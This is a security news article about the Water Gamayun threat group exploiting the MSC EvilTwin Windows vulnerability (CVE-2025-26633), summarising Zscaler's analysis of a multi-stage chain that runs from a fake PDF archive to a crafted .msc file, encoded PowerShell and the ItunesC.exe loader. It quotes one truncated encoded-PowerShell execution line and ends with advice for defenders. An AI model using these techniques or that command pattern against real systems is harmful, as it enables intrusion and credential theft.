Water Gamayun, a persistent threat group, has recently intensified its efforts by exploiting a newly identified MSC EvilTwin vulnerability (CVE-2025-26633) in Windows systems.
This malware campaign is marked by its use of multi-stage attacks targeting enterprise and government organizations, aiming to steal sensitive information, credentials, and maintain long-term access to networks.
Emerging in 2025, these attacks blend sophisticated tactics—such as leveraging trusted binaries and deep obfuscation—to bypass modern security controls while presenting users with convincing lures, such as fake job documents.
The attack begins with a user’s web search that lands on a compromised site. The website silently moves the victim to a lookalike domain, delivering a malicious RAR file disguised as a PDF (masqueraded as “hiringassistant.pdf.rar”).
.webp "Water Gamayun APT Hackers Exploit MSC EvilTwin Vulnerability to Inject Malicious Code 2")
When the user opens this file, the embedded payload exploits the MSC EvilTwin vulnerability by dropping a crafted .msc file. This file is loaded by mmc.exe, which triggers hidden PowerShell commands through the abuse of TaskPad snap-in commands.
As Zscaler security analysts identified, the campaign’s unique approach combines a sequence of password-protected archives, window-hiding code, and staged payload execution to hide its tracks from both users and automated detection tools.
The Zscaler research team attributed this campaign to Water Gamayun due to several strong markers, including the rare abuse of the EvilTwin vulnerability, custom PowerShell obfuscation, and the use of decoy documents to lower suspicion.
Their analysis revealed that, after establishing an initial foothold, the malware chain leverages downloadable executables, archive extraction, and process injection to expand its reach.
Multi-Stage Payload and Hidden Execution
At the core of Water Gamayun’s methodology is a layered infection process. After the disguised RAR file is opened, the payload writes an .msc file to disk.
When executed, mmc.exe interprets this file using malicious snap-in data to run encoded PowerShell via TaskPad. The PowerShell script—the first stage—downloads legitimate tools like UnRAR.exe, then accesses password-protected archives containing additional payloads.
These scripts execute commands such as:-
-EncodedCommand JABX… | iexA second-stage script compiles a .NET module to hide malware windows from view, runs a decoy PDF, and drops the final loader executable, ItunesC.exe. This loader enables long-term persistence by launching multiple instances and hiding network beacons to external IPs.
The campaign highlights how advanced obfuscation and multi-phase execution can evade detection, making it essential for defenders to monitor for rare file extensions, encoded PowerShell use, suspicious process chains, and network activity to similar infrastructure.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
